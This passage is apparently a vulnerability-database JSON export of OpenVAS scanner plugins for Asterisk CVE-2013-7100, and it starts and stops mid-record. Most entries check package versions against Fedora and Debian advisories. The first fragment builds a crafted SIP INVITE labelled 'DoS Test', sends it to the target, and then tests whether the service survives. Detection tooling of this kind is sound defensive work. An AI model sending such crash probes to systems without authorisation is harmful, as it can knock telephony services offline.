\"Call-ID: 1-25912@\", this_host, \"\\r\\n\",\n \"CSeq: 1 INVITE\", \"\\r\\n\",\n \"Contact: sip:guest@\", this_host, \":\", port, \"\\r\\n\",\n \"Max-Forwards: 70\", \"\\r\\n\",\n \"Subject: DoS Test\", \"\\r\\n\",\n \"User-Agent: \", useragent, \" DoS Test\", \"\\r\\n\",\n \"Content-Type: application/sdp\", \"\\r\\n\",\n \"Content-Length: \", strlen(con_data), \"\\r\\n\\r\\n\",\n con_data, \"\\r\\n\");\n\nsip_send_recv( port:port, data:craf_req, proto:proto );\nsleep( 2 );\n\nif( ! sip_alive( port:port, proto:proto ) ) {\n security_message( port:port, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-25T10:48:37", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2014-01-10T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-24142", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7100"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867223", "href": "http://plugins.openvas.org/nasl.php?oid=867223", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-24142\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867223);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-01-10 11:45:29 +0530 (Fri, 10 Jan 2014)\");\n script_cve_id(\"CVE-2013-7100\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-24142\");\n\n tag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\nall of the features you would expect from a PBX and more. Asterisk\ndoes voice over IP in three protocols, and can interoperate with\nalmost all standards-based telephony equipment using relatively\ninexpensive hardware.\n\";\n\n tag_affected = \"asterisk on Fedora 18\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-24142\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125875.html\");\n script_summary(\"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.7.0~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:13", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-01-10T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-24119", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7100"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867224", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867224", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-24119\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867224\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-01-10 11:46:35 +0530 (Fri, 10 Jan 2014)\");\n script_cve_id(\"CVE-2013-7100\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-24119\");\n script_tag(name:\"affected\", value:\"asterisk on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-24119\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125891.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.7.0~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-25T10:48:26", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2014-01-10T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-24119", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7100"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867224", "href": "http://plugins.openvas.org/nasl.php?oid=867224", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-24119\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867224);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-01-10 11:46:35 +0530 (Fri, 10 Jan 2014)\");\n script_cve_id(\"CVE-2013-7100\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-24119\");\n\n tag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\nall of the features you would expect from a PBX and more. Asterisk\ndoes voice over IP in three protocols, and can interoperate with\nalmost all standards-based telephony equipment using relatively\ninexpensive hardware.\n\";\n\n tag_affected = \"asterisk on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-24119\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125891.html\");\n script_summary(\"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.7.0~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:43", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-01-10T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-24142", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7100"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867223", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867223", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-24142\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867223\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-01-10 11:45:29 +0530 (Fri, 10 Jan 2014)\");\n script_cve_id(\"CVE-2013-7100\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-24142\");\n script_tag(name:\"affected\", value:\"asterisk on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-24142\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125875.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.7.0~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:21", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-24108", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7100"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310867306", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867306", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-24108\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867306\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-03 18:42:42 +0530 (Mon, 03 Feb 2014)\");\n script_cve_id(\"CVE-2013-7100\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-24108\");\n script_tag(name:\"affected\", value:\"asterisk on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-24108\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125903.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.7.0~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:31", "description": "Jan Juergens discovered a buffer overflow in the parser for SMS messages\nin Asterisk.\n\nAn additional change was backported, which is fully described AST-2013-007.html.\nWith the fix for AST-2013-007, a new configuration option was added in\norder to allow the system adminitrator to disable the expansion of\ndangerous\nfunctions (such as SHELL()) from any interface which is not\nthe dialplan. In stable and oldstable this option is disabled by default.\nTo enable it add the following line to the section ", "cvss3": {}, "published": "2014-01-05T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2835-1 (asterisk - buffer overflow)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7100"], "modified": "2019-03-19T00:00:00", "id": "OPENVAS:1361412562310702835", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702835", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2835.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 2835-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702835\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2013-7100\");\n script_name(\"Debian Security Advisory DSA 2835-1 (asterisk - buffer overflow)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-01-05 00:00:00 +0100 (Sun, 05 Jan 2014)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2835.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"asterisk on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 1:1.6.2.9-2+squeeze12.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1:1.8.13.1~dfsg1-3+deb7u3.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1:11.7.0~dfsg-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:11.7.0~dfsg-1.\n\nWe recommend that you upgrade your asterisk packages.\");\n script_tag(name:\"summary\", value:\"Jan Juergens discovered a buffer overflow in the parser for SMS messages\nin Asterisk.\n\nAn additional change was backported, which is fully described AST-2013-007.html.\nWith the fix for AST-2013-007, a new configuration option was added in\norder to allow the system adminitrator to disable the expansion of\ndangerous\nfunctions (such as SHELL()) from any interface which is not\nthe dialplan. In stable and oldstable this option is disabled by default.\nTo enable it add the following line to the section '[options]' in\n/etc/asterisk/asterisk.conf (and restart asterisk)\n\nlive_dangerously = no\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1:1.6.2.9-2+squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1:1.8.13.1~dfsg1-3+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-25T10:48:24", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-24108", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7100"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:867306", "href": "http://plugins.openvas.org/nasl.php?oid=867306", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-24108\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867306);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-03 18:42:42 +0530 (Mon, 03 Feb 2014)\");\n script_cve_id(\"CVE-2013-7100\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-24108\");\n\n tag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\nall of the features you would expect from a PBX and more. Asterisk\ndoes voice over IP in three protocols, and can interoperate with\nalmost all standards-based telephony equipment using relatively\ninexpensive hardware.\n\";\n\n tag_affected = \"asterisk on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-24108\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-January/125903.html\");\n script_summary(\"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.7.0~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-31T10:49:13", "description": "Jan Juergens discovered a buffer overflow in the parser for SMS messages\nin Asterisk.\n\nAn additional change was backported, which is fully described in\nhttp://downloads.asterisk.org/pub/security/AST-2013-007.htmlWith the fix for AST-2013-007, a new configuration option was added in\norder to allow the system adminitrator to disable the expansion of\ndangerous \nfunctions (such as SHELL()) from any interface which is not\nthe dialplan. In stable and oldstable this option is disabled by default.\nTo enable it add the following line to the section '[options]' in\n/etc/asterisk/asterisk.conf (and restart asterisk)\n\nlive_dangerously = no", "cvss3": {}, "published": "2014-01-05T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2835-1 (asterisk - buffer overflow)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7100"], "modified": "2017-07-14T00:00:00", "id": "OPENVAS:702835", "href": "http://plugins.openvas.org/nasl.php?oid=702835", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2835.nasl 6724 2017-07-14 09:57:17Z teissa $\n# Auto-generated from advisory DSA 2835-1 using 